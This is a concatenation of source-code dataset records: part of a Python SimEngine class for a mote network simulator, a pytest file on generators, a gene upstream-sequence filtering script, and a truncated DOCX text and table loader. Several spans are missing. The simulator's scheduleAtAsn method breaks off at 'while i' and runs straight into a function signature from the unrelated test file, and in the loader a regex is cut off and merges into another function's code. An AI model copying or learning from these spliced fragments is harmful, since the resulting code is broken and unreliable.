cls._instance\n #===== end singleton\n\n def __init__(self, cpuID=None, runNum=None, failIfNotInit=False):\n\n if failIfNotInit and not self._init:\n raise EnvironmentError('SimEngine singleton not initialized.')\n\n #===== start singleton\n if self._init:\n return\n self._init = True\n #===== end singleton\n\n # store params\n self.cpuID = cpuID\n self.runNum = runNum\n\n self.rect1 = (0.0, 0.9, 3.0, 1.1)\n self.rect2 = (2.0, 1.9, 5.0, 2.1)\n self.rect3 = (0.0, 2.9, 3.0, 3.1)\n self.rect4 = (2.0, 3.9, 5.0, 4.1)\n\n # self.originX = 2.5 # in km\n # self.originY = 4.7 # in km\n # self.targetX = 4.5 # in km\n # self.targetY = 4.6 # in km\n\n # first one is the origin\n self.targets = [(4.6, 4.6), (0.9, 3.95), (4.6, 2.95), (0.9, 1.95), (4.6, 0.95)]\n # self.targets = [(1.0, 3.7), (4.0, 2.7), (1.0, 1.7), (4.5, 0.5)]\n # self.targets = [(4.0, 2.7), (1.0, 1.7), (4.5, 0.5)]\n self.targetType = {}\n\n self.targetRadius = 0.100 # in km\n self.targetPos = {} # dict: mote -> (x, y) relative to workingTargetX\n self.targetIndex = {}\n self.margin = 0.02\n self.goalDistanceFromTarget = 0.01\n\n # local variables\n self.dataLock = threading.RLock()\n self.pauseSem = threading.Semaphore(0)\n self.simPaused = False\n self.goOn = True\n self.asn = 0\n self.startCb = []\n self.endCb = []\n self.events = []\n self.settings = SimSettings.SimSettings()\n random.seed(self.settings.seed)\n np.random.seed(self.settings.seed)\n self.genMobility = random.Random()\n self.genMobility.seed(self.settings.seed)\n self.propagation = Propagation.Propagation()\n self.ReSFEngine = None\n if self.settings.sf == 'resf':\n self.ReSFEngine = ReSFEngine.ReSFEngine()\n self.motes = [Mote.Mote(id) for id in range(self.settings.numMotes)]\n self.topology = Topology.Topology(self.motes)\n self.topology.createTopology()\n\n # Not valid values. 
Will be set by the last mote that converged.\n self.asnInitExperiment = 999999999\n self.asnEndExperiment = 999999999\n\n self.dedicatedCellConvergence = 99999999\n\n # # boot all motes\n # for i in range(len(self.motes)):\n # self.motes[i].boot()\n\n self.motes[0].boot()\n\n # initialize parent class\n threading.Thread.__init__(self)\n self.name = 'SimEngine'\n\n def destroy(self):\n # destroy the propagation singleton\n self.propagation.destroy()\n\n # destroy my own instance\n self._instance = None\n self._init = False\n\n #======================== thread ==========================================\n\n def getTrafficPeriod(self):\n pick = -1.0\n trafficAverage = self.settings.pkPeriod\n trafficStd = trafficAverage / 4\n while pick <= 0.0:\n pick = np.random.normal(trafficAverage, trafficStd, None)\n if pick < trafficAverage:\n pick = math.ceil(pick)\n else:\n pick = math.floor(pick)\n return pick\n\n def run(self):\n \"\"\" event driven simulator, this thread manages the events \"\"\"\n\n # log\n log.info(\"thread {0} starting\".format(self.name))\n\n # schedule the endOfSimulation event if we are not simulating the join process\n if not self.settings.withJoin:\n if not self.settings.convergeFirst:\n self.scheduleAtAsn(\n asn = self.settings.slotframeLength*self.settings.numCyclesPerRun,\n cb = self._actionEndSim,\n uniqueTag = (None,'_actionEndSim'),\n )\n else:\n self.scheduleAtAsn(\n asn = self.settings.slotframeLength*self.settings.maxToConverge,\n cb = self._actionEndSim,\n uniqueTag = (None,'_actionEndSim'),\n )\n\n if self.settings.trafficGenerator == 'pick':\n periods = None\n if self.settings.trafficFrequency == 'short':\n periods = [200, 400, 600] # 3s, 6s, 9s\n elif self.settings.trafficFrequency == 'medium':\n periods = [2000, 3000, 4000] # 30s, 45s, 60s\n elif self.settings.trafficFrequency == 'long':\n periods = [20000, 30000, 40000] # 5 min (300s), 7.5 min (450s), 10 min (600s)\n\n # periods = [200, 500, 1000, 3000, 6000, 12000]\n # periods = [200, 400, 600, 800, 1000]\n # periods = [200]\n # slotduration = 0.015, [3.0, 7.5, 15.0, 45.0, 90.0, 180.0] seconds\n # slotduration = 0.010, [2.0, 5.0, 10.0, 30.0, 60.0, 120.0] seconds\n for m in self.motes:\n if m.id > 0:\n m.startApp = random.randint(0, 6000)\n m.pkPeriod = periods[random.randint(0, len(periods)-1)] * float(self.settings.slotDuration)\n log.info(\"Mote {0}, theoretical start delay = {1}, period = {2}.\".format(m.id, m.startApp, m.pkPeriod))\n\n sporadics = [4000, 6000, 8000]\n for m in self.motes:\n if m.id > 0:\n m.sporadic = sporadics[random.randint(0, len(sporadics)-1)] * float(self.settings.slotDuration)\n m.sporadicStart = random.randint(0, 2000)\n log.info(\"Mote {0}, sporadic sending first = {1}.\".format(m.id, m.sporadic))\n elif self.settings.trafficGenerator == 'normal':\n for m in self.motes:\n if m.id > 0:\n m.startApp = random.randint(0, 6000)\n m.pkPeriod = self.getTrafficPeriod()\n log.info(\"Mote {0}, theoretical start delay = {1}, period = {2}.\".format(m.id, m.startApp, m.pkPeriod))\n else:\n assert False\n\n\n if self.settings.mobilityModel == 'RPGM':\n for m in range(0, self.settings.numMotes):\n self.targetPos[m] = (\n self.targets[1][0] + self.genMobility.uniform((-1.0 * self.targetRadius) + 0.005, self.targetRadius - 0.005),\n self.targets[1][1] + self.genMobility.uniform((-1.0 * self.targetRadius) + 0.005, self.targetRadius - 0.005))\n self.targetIndex[m] = 1\n self.targetType[m] = 'up'\n\n # call the start callbacks\n for cb in self.startCb:\n cb()\n\n # for m in self.motes:\n # 
log.info(\n # \"[topology] shortest mote to {0} is {1}.\".format(m.id, m.closestNeighbor.id),\n # )\n\n # consume events until self.goOn is False\n while self.goOn:\n\n with self.dataLock:\n\n # abort simulation when no more events\n if not self.events:\n log.info(\"end of simulation at ASN={0}\".format(self.asn))\n break\n\n # make sure we are in the future\n (a, b, cb, c) = self.events[0]\n if c[1] != '_actionPauseSim':\n assert self.events[0][0] >= self.asn\n\n # update the current ASN\n self.asn = self.events[0][0]\n\n # if self.asn == 10000:\n # self._actionPauseSim()\n\n interval = 4\n newCycle = int(self.getAsn() / self.settings.slotframeLength)\n index = newCycle / interval\n if newCycle % interval == 0 and index < len(self.motes) and self.motes[index].isJoined == False:\n self.motes[index].boot()\n log.info(\"Booting node {0}\".format(index))\n\n if self.asn % self.settings.slotframeLength == 0:\n # rdm = self.propagation.print_random()\n # log.info(\"topology random={0}\".format(rdm))\n log.info(\"[6top] ----------- SLOTFRAME BEGIN -----------\")\n\n # only start moving when the experiment started, there is a mobility model and do it at the beginning of every cycle\n if self.asn > self.asnInitExperiment and self.settings.mobilityModel != 'none' and self.asn % self.settings.slotframeLength == 0:\n if self.settings.mobilityModel == 'RWM': # random walk model\n for m in self.motes:\n if m.id != 0:\n m.updateLocation()\n elif self.settings.mobilityModel == 'RPGM':\n for m in self.motes:\n m.updateLocation()\n self.topology.updateTopology()\n for m in self.motes:\n m._tsch_updateMinimalCells() # update the neighbors of the minimal cells\n\n if self.settings.sf == 'resf':\n self.ReSFEngine.action()\n\n # call callbacks at this ASN\n while True:\n if self.events[0][0]!=self.asn:\n break\n (_,_,cb,_) = self.events.pop(0)\n cb()\n\n # call the end callbacks\n for cb in self.endCb:\n cb()\n\n # log\n log.info(\"thread {0} ends\".format(self.name))\n\n #======================== public ==========================================\n\n # called when there is dedicated cell or ReSF convergence\n def startSending(self):\n\n if self.settings.sf == 'resf':\n # this is called when ReSF reservations all arrived at root\n\n assert self.dedicatedCellConvergence != 99999999\n # offset until the end of the cycle where the dedicated cell convergence happened, just as we do with the other SFs\n offset = self.settings.slotframeLength - (self.dedicatedCellConvergence % self.settings.slotframeLength)\n\n for m in self.motes:\n if m.id > 0:\n delay = (offset + m.startApp)\n log.info(\"Current ASN: {0}\".format(self.asn))\n log.info(\"Mote {0} would theoretically (convergence + offset + delay start) start at ASN {1}, period of {2}.\".format(m.id, self.dedicatedCellConvergence + delay, m.pkPeriod))\n\n startTransmission = self.dedicatedCellConvergence + delay\n while startTransmission <= self.asn:\n startTransmission += int(m.pkPeriod / float(self.settings.slotDuration))\n log.info(\"Mote {0}, will start at ASN {1}, period of {2}.\".format(m.id, startTransmission,\n int(m.pkPeriod / float(\n self.settings.slotDuration))))\n\n # delay *= float(self.settings.slotDuration)\n # schedule the transmission of the first packet\n self.scheduleAtAsn(\n asn=startTransmission,\n cb=m._app_action_sendSinglePacket,\n uniqueTag=(m.id, '_app_action_sendSinglePacket'),\n priority=2,\n )\n if self.settings.sporadicTraffic == 1:\n self.scheduleAtAsn(\n asn=startTransmission + m.sporadicStart,\n 
cb=m._app_action_sendSporadicPacket,\n uniqueTag=(m.id, '_app_action_sendSporadicPacket'),\n priority=2,\n )\n else:\n # offset until the end of the current cycle\n offset = self.settings.slotframeLength - (self.asn % self.settings.slotframeLength)\n for m in self.motes:\n if m.id > 0:\n delay = (offset + m.startApp)\n log.info(\"Mote {0}, will start at ASN {1}, period of {2}.\".format(m.id, self.getAsn()+delay, m.pkPeriod))\n delay *= float(self.settings.slotDuration)\n # schedule the transmission of the first packet\n self.scheduleIn(\n delay=delay,\n cb=m._app_action_sendSinglePacket,\n uniqueTag=(m.id, '_app_action_sendSinglePacket'),\n priority=2,\n )\n if self.settings.sporadicTraffic == 1:\n self.scheduleIn(\n delay=delay + (m.sporadicStart*float(self.settings.slotDuration)),\n cb=m._app_action_sendSporadicPacket,\n uniqueTag=(m.id, '_app_action_sendSporadicPacket'),\n priority=2,\n )\n\n\n def checkValidPosition(self, xcoord, ycoord, countSquare=True, placement=False):\n '''\n Checks if a given postition is valid when moving\n '''\n\n margin = self.margin\n if placement:\n margin = 0.02\n\n inSquare = False # total area\n insideObstacle1 = False # rectangle 1\n insideObstacle2 = False # rectangle 2\n insideObstacle3 = False # rectangle 1\n insideObstacle4 = False # rectangle 2\n if countSquare:\n if (xcoord < self.settings.squareSide and ycoord < self.settings.squareSide) and (\n xcoord > 0 and ycoord > 0):\n inSquare = True\n else:\n inSquare = True\n\n if (xcoord < (self.rect1[2] + margin)) and (ycoord > (self.rect1[1] - margin) and (ycoord < (self.rect1[3] + margin))):\n insideObstacle1 = True\n if (xcoord > (self.rect2[0] - margin)) and (ycoord > (self.rect2[1] - margin) and (ycoord < (self.rect2[3] + margin))):\n insideObstacle2 = True\n if (xcoord < (self.rect3[2] + margin)) and (ycoord > (self.rect3[1] - margin) and (ycoord < (self.rect3[3] + margin))):\n insideObstacle3 = True\n if (xcoord > (self.rect4[0] - margin)) and (ycoord > (self.rect4[1] - margin) and (ycoord < (self.rect4[3] + margin))):\n insideObstacle4 = True\n\n if inSquare and not insideObstacle1 and not insideObstacle2 and not insideObstacle3 and not insideObstacle4:\n return True\n else:\n return False\n\n #=== scheduling\n\n def scheduleAtStart(self,cb):\n with self.dataLock:\n self.startCb += [cb]\n\n def scheduleIn(self,delay,cb,uniqueTag=None,priority=0,exceptCurrentASN=True):\n \"\"\" used to generate events. 
Puts an event to the queue \"\"\"\n\n with self.dataLock:\n asn = int(self.asn+(float(delay)/float(self.settings.slotDuration)))\n\n self.scheduleAtAsn(asn,cb,uniqueTag,priority,exceptCurrentASN)\n\n def scheduleAtAsn(self,asn,cb,uniqueTag=None,priority=0,exceptCurrentASN=True):\n \"\"\" schedule an event at specific ASN \"\"\"\n\n # make sure we are scheduling in the future\n assert asn>self.asn\n\n # remove all events with same uniqueTag (the event will be rescheduled)\n if uniqueTag:\n self.removeEvent(uniqueTag,exceptCurrentASN)\n\n with self.dataLock:\n\n # find correct index in schedule\n i = 0\n while i Generator[T, None, None]:\n \"\"\"Return a simple generator that only yields values in reverse.\"\"\"\n for index in range(len(data) - 1, -1, -1):\n yield data[index]\n\n\ndef test_generator_for() -> None:\n \"\"\"Iterating through a generator in a `for` loop.\"\"\"\n reversed_str: List[str] = []\n for char in reverse(\"golf\"):\n reversed_str.append(char)\n assert \"\".join(reversed_str) == \"flog\"\n\n assert \"\".join(reverse(\"golf\")) == \"flog\"\n\n\ndef test_generator_manual() -> None:\n \"\"\"Iterating through a generator manually.\"\"\"\n reversed_int: List[int] = []\n\n generator = reverse([1, 2, 3])\n reversed_int.append(next(generator))\n reversed_int.append(next(generator))\n reversed_int.append(next(generator))\n\n with pytest.raises(StopIteration):\n next(generator)\n\n assert reversed_int == [3, 2, 1]\n\n\ndef test_generator_send() -> None:\n \"\"\"Interact with a generator using its `send()` method.\"\"\"\n\n def reverse_send() -> Generator[int, int, str]:\n \"\"\"Return a generator that produces `int`s in descending order.\"\"\"\n start = yield 0\n for index in range(start, -1, -1):\n yield index\n\n return \"done\"\n\n reversed_int: List[int] = []\n\n generator = reverse_send()\n # The first `send()` to start the generator must be a `None`.\n assert generator.send(None) == 0\n\n reversed_int.append(generator.send(3))\n for num in generator:\n reversed_int.append(num)\n\n assert reversed_int == [3, 2, 1, 0]\n\n\ndef test_generator_echo() -> None:\n \"\"\"Generator yield, send and return types.\"\"\"\n\n def echo_round() -> Generator[int, float, str]:\n \"\"\"Round `float` that is sent in to the nearest `int`.\"\"\"\n sent = yield 0\n while sent >= 0:\n sent = yield round(sent)\n return \"Done\"\n\n generator = echo_round()\n assert next(generator) == 0\n\n assert generator.send(1.1) == 1\n assert generator.send(1.6) == 2\n\n with pytest.raises(StopIteration) as ex_info:\n generator.send(-1)\n assert \"Done\" in str(ex_info.value)\n\n\ndef test_generator_expressions() -> None:\n \"\"\"Generator expression as a succinct form of generator function.\"\"\"\n data = \"golf\"\n # This generator expression is essentially the same as the reverse() function above.\n reverse_generator: Generator[str, None, None] = (\n data[i] for i in range(len(data) - 1, -1, -1)\n )\n\n assert next(reverse_generator) == \"f\"\n assert next(reverse_generator) == \"l\"\n assert next(reverse_generator) == \"o\"\n assert next(reverse_generator) == \"g\"\n\n with pytest.raises(StopIteration):\n next(reverse_generator)\n\n\ndef test_gen_expr_maths() -> None:\n \"\"\"Some mathematical operations implemented with generator expressions.\"\"\"\n # Sum of squares\n squares_generator: Generator[int, None, None] = (i * i for i in range(10))\n assert sum(squares_generator) == sum((1, 4, 9, 16, 25, 36, 49, 64, 81))\n\n # Dot product\n x_vector: Tuple[int, int, int] = (1, 3, 5)\n y_vector: Tuple[int, int, 
int] = (2, 4, 6)\n assert sum(x * y for x, y in zip(x_vector, y_vector)) == 44\n\n\ndef test_gen_expr_unique_words() -> None:\n \"\"\"Using a generator expression to find unique words in a file.\"\"\"\n sample_file: Path = Path(__file__).parent.joinpath(\"sample.txt\")\n with open(sample_file) as file:\n unique_words: Set[str] = set(words for line in file for words in line.split())\n\n assert unique_words == {\"line\", \"one\", \"two\", \"three\"}\n\n\ndef test_gen_expr_named_tuples() -> None:\n \"\"\"Using a generator expression with named tuples.\"\"\"\n Student = NamedTuple(\"Student\", [(\"gpa\", float), (\"name\", str)])\n graduates: List[Student] = [\n Student(gpa=3.5, name=\"Tallys\"),\n Student(gpa=3.8, name=\"Kaniya\"),\n Student(gpa=3.7, name=\"Toibe\"),\n ]\n\n valedictorian = max((student.gpa, student.name) for student in graduates)\n assert valedictorian == (3.8, \"Kaniya\")\n","repo_name":"jashburn8020/the-python-tutorial","sub_path":"src/ch09/generators_test.py","file_name":"generators_test.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
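A quick aside on the `Generator[YieldType, SendType, ReturnType]` typing exercised by `generators_test.py` above: a generator's `return` value surfaces as `StopIteration.value`. A minimal sketch (the `running_total` name is illustrative, not from the record):

```python
from typing import Generator

def running_total() -> Generator[int, int, str]:
    """Yield a running total of the values sent in; return "done" when advanced with next()."""
    total = 0
    while True:
        sent = yield total
        if sent is None:  # a plain next() sends None
            return "done"
        total += sent

gen = running_total()
assert next(gen) == 0      # prime the generator up to its first yield
assert gen.send(2) == 2
assert gen.send(3) == 5
try:
    next(gen)              # sends None, so the generator returns
except StopIteration as ex:
    assert ex.value == "done"
```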
+{"seq_id":"72073244388","text":"#This is redundant with UpstreamFinder.py and other RStudio scripts!\nprint('This is redundant with UpstreamFinder.py and other RStudio scripts!')\n\n#same as UpstreamFinder.py, but only counts gene for vvd if up/downreg isnt seen in wt.\n#Thereofre, select for uniques.\n\n\nimport sys\n\ntry:\n DEfile = open(\"/Users/langyy/Desktop/Differential_expression/DEgenes_tables/DEgenes_vvd25_0_4.txt\",'r') #vvd here.\n DEfile2 = open(\"/Users/langyy/Desktop/Differential_expression/DEgenes_tables/DEgenes_wt25_0_4.txt\",'r') #wt here.\n upstreamfile = open(\"/Users/Neurospora/Desktop/Joseph_Things/NC_Upstream.fasta\",'r')\n outputfile = open(\"UpstreamFound_vvd25_0_4_corrected.txt\", \"w\") #Added 'corrected' to name of file\n namesoutput = open(\"UpstreamFound_vvd25_0_4_names.txt\", \"w\")\n\nexcept:\n print(\"Files not found: Probably wrong directory.\")\n sys.exit()\n\nvalidletters = \"UBDubd\"\nupordown2 = input(\"Up or Down reg or both? (U/D/B) : \")\nif upordown2 in validletters:\n print(\"Assuming \", upordown2.upper(), sep='')\nelse:\n print(\"Please only use single-letter option U/B/D.\")\n sys.exit()\nupordown = upordown2.upper()\nnumberlist = []\nnumberlist1 = []\nnumberlist2 = []\nWholeFile1 = {}\nWholeFile2 = {}\nnumba = \"test\"\nsequence = \"also test\"\nsequencedict = {}\nnumber = str\n\n\nfor line in DEfile:\n if line.startswith(\"\\\"NCU\"):\n data = line.split(\" \")\n number = (data[0])[1:-1]\n numberlist1.append(number)\n WholeFile1[(data[0])[1:-1]] = data[2]\nfor line in DEfile2:\n if line.startswith(\"\\\"NCU\"):\n data = line.split(\" \")\n number = (data[0])[1:-1]\n numberlist2.append(number)\n WholeFile2[(data[0])[1:-1]] = data[2]\n\nduplicatecounter1 = 0\nduplicatecounter2 = 0\nfor u in range(0, len(numberlist1)):\n if numberlist1[u] in numberlist2:\n duplicatecounter1 += 1\n\n if (float(WholeFile1[numberlist1[u]])- float(WholeFile2[numberlist1[u]])) >= 1 and (upordown == 'U' or upordown == 'B'):\n print(numberlist1[u], \" has been upregulated.\", sep = '')\n elif (float(WholeFile1[numberlist1[u]])- float(WholeFile2[numberlist1[u]])) <= -1 and (upordown == 'D' or upordown == \"B\"):\n print(numberlist1[u], \" has been downregulated.\", sep='')\n numberlist.append(numberlist1[u])\n elif float(WholeFile1[numberlist1[u]]) >= 1 and (upordown == 'U' or upordown == 'B'):\n numberlist.append(numberlist1[u])\n duplicatecounter2 += 1\n elif float(WholeFile1[numberlist1[u]]) <= -1 and (upordown == 'D' or upordown == 'B'):\n numberlist.append(numberlist1[u])\n duplicatecounter2 += 1\n\n\n##make dictionary for NCU numnbers and upstream elements.\nfor line in upstreamfile:\n if line.startswith(\">\"):\n sequencedict[numba] = ''.join(sequence)\n sequence = []\n data = line.split(\" \")\n numba = (data[1])[1:-1]\n else:\n sequence.append((line).strip())\n\ncounterforfailmatch = 0\nfailedmatchnumbers = []\nfor i in range(0, len(numberlist)):\n if numberlist[i] in sequencedict:\n print(\">\", str(numberlist[i]), \"\\n\", sequencedict[str(numberlist[i])], sep = '', file = outputfile)\n print(numberlist1[i], \"\\n\", sep = '', file = namesoutput)\n else:\n counterforfailmatch += 1\n failedmatchnumbers.append(numberlist[i])\nprint(\"Reduced from \", len(numberlist1), \" to \", len(numberlist))\nprint(\"Number of upstream elements found successfully: \", len(numberlist) - counterforfailmatch)\nprint(\"Number of failed matches: \", counterforfailmatch, \"\\nAccession numbers of failed matches: \", 
failedmatchnumbers)\n","repo_name":"Joenetics/N.Crassa_25-28C","sub_path":"UpstreamUniques.py","file_name":"UpstreamUniques.py","file_ext":"py","file_size_in_byte":3610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
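The `UpstreamUniques.py` record above filters one differential-expression list against another with repeated `in` checks on Python lists, which is O(n*m). A hedged sketch of the same idea with set operations (gene IDs and fold-change values below are made up):

```python
# gene -> log fold change (illustrative values only)
vvd_genes = {"NCU00001": 1.4, "NCU00002": -2.0, "NCU00003": -1.2}
wt_genes = {"NCU00002": -1.8}

unique_to_vvd = vvd_genes.keys() - wt_genes.keys()   # O(1) membership per gene
shared = vvd_genes.keys() & wt_genes.keys()
# among shared genes, keep those whose fold change differs by at least 1
divergent = {g for g in shared if abs(vvd_genes[g] - wt_genes[g]) >= 1}

print(sorted(unique_to_vvd))  # ['NCU00001', 'NCU00003']
print(sorted(divergent))      # []
```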
+{"seq_id":"73461962145","text":"import os\nimport re\n# import camelot\nimport tabula\nimport PyPDF2\n# import pdfplumber\nimport slate3k as slate\nimport docx\n\nfrom typing import List, Dict\nfrom tqdm.auto import tqdm\n# from pdfminer.high_level import extract_text\nfrom docx2python import docx2python\n\n\nPYPDF2_KEY = 'pypdf2'\nSLATE_KEY = 'slate'\nCAMELOT_KEY = 'camelot'\nTABULA_KEY = 'tabula'\nPLUMBER_KEY = 'plumber'\nTIKA_KEY = 'tika'\nMINER_KEY = 'miner'\nREGEX_KEY = 'regex'\nOCR_KEY = 'ocr'\nDOXC_KEY = 'doxc'\nDOXC2PYTHON_KEY = 'doxc2python'\nFIGURE_THRESHOLD = 0.1\nEPSILON = 1e-10\nREPEAT_THRESHOLD = 4\nMAX_CHAR_COUNT_FOR_FIGURE = 20\nFIGURE_RELATED_CHARS = r\"[0123456789.%-]\"\nCOMMON_UNITS = [\"kg\", \"m\", \"s\", \"h\", \"g\", \"cm\", \"mm\", \"l\", \"ml\"]\nDOCX_NAMESPACE = {'w': 'http://schemas.openxmlformats.org/wordprocessingml/2006/main'}\n# DICT KEYS\nMETADATA_KEY = \"metadata\"\nCOMP_KEY = \"company\"\nREPORT_KEY = \"report\"\nFIGURE_KEY = \"potential_figure\"\nTABLE_KEY = \"table\"\nTABLE_ROWS_KEY = \"table\"\nTEXT_KEY = \"text\"\n\n\ndef read_txt(filename: str):\n with open(filename, 'r') as f:\n contents = f.read()\n return contents\n\n\ndef extract_footnotes_from_para(para, next_para=None):\n \"\"\"Extract footnote references and actual footnotes from a paragraph.\"\"\"\n footnotes = []\n\n footnote_refs = para._element.findall('.//w:footnoteReference', namespaces=DOCX_NAMESPACE)\n\n for ref in footnote_refs:\n footnote_id = ref.get(\"{http://schemas.openxmlformats.org/wordprocessingml/2006/main}id\")\n footnote = para.part.footnotes_part.footnote_dict[footnote_id]\n footnotes.append(footnote.text)\n\n # Check in the next paragraph for footnotes if provided\n if next_para:\n next_footnote_refs = next_para._element.findall('.//w:footnoteReference', namespaces=DOCX_NAMESPACE)\n for ref in next_footnote_refs:\n footnote_id = ref.get(\"{http://schemas.openxmlformats.org/wordprocessingml/2006/main}id\")\n footnote = next_para.part.footnotes_part.footnote_dict[footnote_id]\n footnotes.append(footnote.text)\n\n return footnotes\n\n\ndef process_footnotes(text, footnotes):\n \"\"\"Process and embed footnotes into the text.\"\"\"\n\n # Existing replacement for footnotes within brackets\n for idx, footnote in enumerate(footnotes, 1):\n text = re.sub(r\"\\[{}\\]\".format(idx), \"[{}]\".format(footnote), text)\n\n # New addition: replace footnotes appearing directly after words or at the end of sentences\n for idx, footnote in enumerate(footnotes, 1):\n # This regex will look for a number that doesn't have another number directly before\n # it (to differentiate from normal numbers within the text)\n pattern = r'(? 
MAX_CHAR_COUNT_FOR_FIGURE):\n return False\n\n if (char_count == 0) or (figure_char_count / (\n char_count + EPSILON) > FIGURE_THRESHOLD) or contains_common_units or contains_percentage:\n return True\n\n return False\n\n\ndef repeated_artifact_check(line, artifact_dict):\n \"\"\"Check if a line is a repeated artifact and update its count.\"\"\"\n if line in artifact_dict:\n artifact_dict[line] += 1\n if artifact_dict[line] > REPEAT_THRESHOLD:\n return True # It's a repeated artifact\n else:\n artifact_dict[line] = 1\n return False\n\n\ndef _is_empty(text):\n return len(text) == 0\n\n\nclass Loader(object):\n\n TEXT_LOADERS = {}\n TABLE_LOADERS = {}\n FIGURE_LOADERS = {}\n\n def __init__(self, file_path: str, dir_path: str):\n self._path = None # Initialize _path to None\n self.path = os.path.join(dir_path, file_path)\n\n def load_tables(self, key: str):\n\n if key not in self.TABLE_LOADERS.keys():\n raise KeyError(\n f\"The following table loaders: {[self.TABLE_LOADERS.keys()]} are supported. \"\n f\"Not {key}\"\n )\n\n return self.TABLE_LOADERS[key](self.path)\n\n def load_text(self, key: str):\n\n if key not in self.TEXT_LOADERS.keys():\n raise KeyError(\n f\"The following text loaders: {[self.TEXT_LOADERS.keys()]} are supported. \"\n f\"Not {key}\"\n )\n\n return self.TEXT_LOADERS[key](self.path)\n\n def load_figure(self, key: str):\n\n if key not in self.FIGURE_LOADERS.keys():\n raise KeyError(\n f\"The following figure loaders: {[self.FIGURE_LOADERS.keys()]} are supported. \"\n f\"Not {key}\"\n )\n\n return self.FIGURE_LOADERS[key](self.path)\n\n\n# TODO: Finalise, text, table, and figure loaders\nclass DOXCLoader(Loader):\n\n def __init__(self, file_path, dir_path='./data/doxc_db'):\n super().__init__(file_path=file_path, dir_path=dir_path)\n\n @property\n def path(self):\n return self._path\n\n @path.setter\n def path(self, new_path):\n if not os.path.exists(new_path):\n raise FileNotFoundError(f\"The file {new_path} does not exist.\")\n\n if not new_path.lower().endswith('.doxc'):\n raise ValueError(\"The file must be a DOXC.\")\n\n if not os.path.isfile(new_path):\n raise ValueError(\"The path must point to a file, not a directory.\")\n\n self._path = new_path\n\n def docx2python_text_loader(self) -> List[str]:\n \"\"\"\n Extract text from a .doxc file using docx2python.\n :return: A list of strings, where each string represents a block of text.\n \"\"\"\n # Extract the .doxc content\n docx_content = docx2python(self.path)\n text_content = []\n\n # docx2python represents the docx as a list of lists.\n # You navigate through these to find paragraphs.\n # Iterate through the body (ignores headers, footers)\n for docx_part in docx_content.body:\n for table in docx_part:\n for row in table:\n for cell in row:\n # strip() removes whitespace at the beginning and end of the text\n processed_text = cell.text.strip()\n if processed_text: # ignore empty strings\n text_content.append(processed_text)\n\n return text_content\n\n def doxc_text_loader(self) -> List[str]:\n \"\"\"\n Extract text from a .doxc file.\n :return: A list of strings, where each string represents a block of text.\n \"\"\"\n doc = docx.Document(self.path)\n text_content = []\n for paragraph in doc.paragraphs:\n processed_text = paragraph.text.strip()\n if not _is_empty(processed_text):\n text_content.append(processed_text)\n return text_content\n\n def doxc_fig_loader(self) -> List[Dict]:\n \"\"\"\n Extract figures from a .doxc file.\n :return: A list of dicts, each containing the title and data of a figure.\n \"\"\"\n 
doc = docx.Document(self.path)\n figures = []\n figure_data_group = {'title': None, 'data': []}\n previous_text = None\n\n for paragraph in doc.paragraphs:\n processed_text = paragraph.text.strip()\n if not _is_empty(processed_text):\n current_is_figure_data = is_potential_figure_data(processed_text)\n if current_is_figure_data:\n if not figure_data_group['title']:\n figure_data_group['title'] = previous_text\n figure_data_group['data'].append(processed_text)\n else:\n if figure_data_group['data']:\n figures.append(figure_data_group)\n figure_data_group = {'title': None, 'data': []}\n previous_text = processed_text\n return figures\n\n def doxc_table_loader(self) -> List[Dict]:\n \"\"\"\n Extract tables from a .doxc file.\n :return: A list of dicts, each containing the title, column headers, and rows of a table.\n \"\"\"\n doc = docx.Document(self.path)\n tables = []\n previous_text = None\n\n for table in doc.tables:\n headers = [cell.text.strip() for cell in table.rows[0].cells]\n rows = []\n\n for row in table.rows[1:]:\n row_data = {headers[j]: cell.text.strip() for j, cell in enumerate(row.cells)}\n rows.append(row_data)\n\n tables.append({\n 'title': previous_text,\n 'col_headers': headers,\n TABLE_ROWS_KEY: rows\n })\n\n # Reset the previous_text if the title was just used\n previous_text = None\n\n # Update the previous_text with the last cell's text of the last row if it's not empty\n if rows and rows[-1]:\n last_cell_text = list(rows[-1].values())[-1]\n if last_cell_text.strip():\n previous_text = last_cell_text\n\n return tables\n\n def doxc_load_all(\n self,\n ) -> dict:\n\n def _is_empty(text):\n if len(text) == 0:\n return True\n return False\n\n doc = docx.Document(self.path)\n\n result = {\n METADATA_KEY: {\n 'title': doc.core_properties.title,\n 'author': doc.core_properties.author,\n 'created': doc.core_properties.created,\n },\n TEXT_KEY: [],\n TABLE_KEY: [],\n FIGURE_KEY: [],\n }\n\n figure_data_group = {'title': None, 'data': []}\n current_is_figure_data = False\n previous_text = None\n\n artifact_dict = {}\n\n for current_elem, next_elem in tqdm(zip(doc.element.body, doc.element.body[1:] + [None])):\n\n # Paragraph\n if current_elem.tag.endswith('p'):\n\n current_para = docx.text.paragraph.Paragraph(current_elem, None)\n next_para = docx.text.paragraph.Paragraph(next_elem, None)\n\n processed_text = current_para.text.strip()\n # Ignore empty lines or repeated lines\n if _is_empty(processed_text) or repeated_artifact_check(processed_text, artifact_dict):\n continue\n try:\n next_text = next_para.text\n except AttributeError:\n next_text = None\n\n # Process footnotes\n footnotes = extract_footnotes_from_para(current_para, next_para)\n processed_text = process_footnotes(processed_text, footnotes)\n\n # Identify if the current line is potential figure data\n previous_was_figure_data = current_is_figure_data # Move the window forward\n current_is_figure_data = is_potential_figure_data(processed_text)\n next_is_figure_data = is_potential_figure_data(next_text)\n\n if current_is_figure_data:\n\n # If previous line was also figure data, they belong to the same figure\n if previous_was_figure_data:\n figure_data_group['data'].append(processed_text)\n else:\n # If a new figure starts, save the previous figure (if there was any)\n if figure_data_group['data']:\n result[FIGURE_KEY].append(figure_data_group)\n figure_data_group = {'title': None, 'data': []}\n\n # Assign the previous line as the title for the current figure\n figure_data_group['title'] = previous_text\n 
